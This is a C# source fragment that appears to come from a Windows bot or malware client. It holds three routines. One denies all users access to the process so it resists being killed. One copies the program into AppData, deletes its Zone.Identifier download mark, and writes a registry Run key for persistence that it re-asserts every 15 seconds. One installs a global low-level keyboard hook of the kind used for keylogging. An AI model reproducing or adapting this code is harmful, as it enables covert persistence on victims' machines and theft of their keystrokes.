public static bool ProtectProcess(bool bProtect)
{
try
{
IntPtr hProcess = CKernel32.GetCurrentProcess();
// Read the DACL
RawSecurityDescriptor dacl = GetProcessSecurityDescriptor(hProcess);
// Insert the new ACE
dacl.DiscretionaryAcl.InsertAce(
0,
new CommonAce(
AceFlags.None,
bProtect ? AceQualifier.AccessDenied : AceQualifier.AccessAllowed,
(int)ProcessAccessRights.PROCESS_ALL_ACCESS,
new SecurityIdentifier(WellKnownSidType.WorldSid, null),
false,
null)
);
// Save the DACL
SetProcessSecurityDescriptor(hProcess, dacl);
return(true);
}
catch { }
return(false);
}
public static Boolean InstallBot()
{
try
{
String strDropPath = CUtils.GetAppData();
if (String.IsNullOrEmpty(strDropPath))
{
return(false);
}
String strMainPath = CUtils.GetMainPath();
if (String.IsNullOrEmpty(strMainPath))
{
return(false);
}
strDropPath += strFileName;
if (strDropPath == strMainPath)
{
new Thread(delegate()
{
while (bRegistryPersistance)
{
CRegistry.SetRegValue(CUtils.IsElevated() ? Registry.LocalMachine : Registry.CurrentUser, @"Software\Microsoft\Windows\CurrentVersion\Run", strRegistryName, strDropPath);
DateTime dtNextAdd = DateTime.Now.AddSeconds(15);
while (dtNextAdd > DateTime.Now && bRegistryPersistance)
{
Thread.Sleep(10);
}
}
}).Start();
return(true);
}
File.Copy(strMainPath, strDropPath, true);
CKernel32.DeleteFile(
string.Format(
"{0}:Zone.Identifier",
strDropPath)
);
if (CRegistry.SetRegValue(CUtils.IsElevated() ? Registry.LocalMachine : Registry.CurrentUser, @"Software\Microsoft\Windows\CurrentVersion\Run", strRegistryName, strDropPath))
{
Process.Start(strDropPath);
}
}
catch { }
Application.Exit();
return(false);
}
public static bool ApplyHook()
{
using (Process pCurrentProcess = Process.GetCurrentProcess())
{
using (ProcessModule pmModule = pCurrentProcess.MainModule)
{
IntPtr pModule = CKernel32.GetModuleHandle(pmModule.ModuleName);
if (pModule == IntPtr.Zero)
{
return(false);
}
m_pHookID = CUser32.SetWindowsHookEx(
13,
m_HookCallback,
pModule,
0
);
return(m_pHookID != IntPtr.Zero);
}
}
}
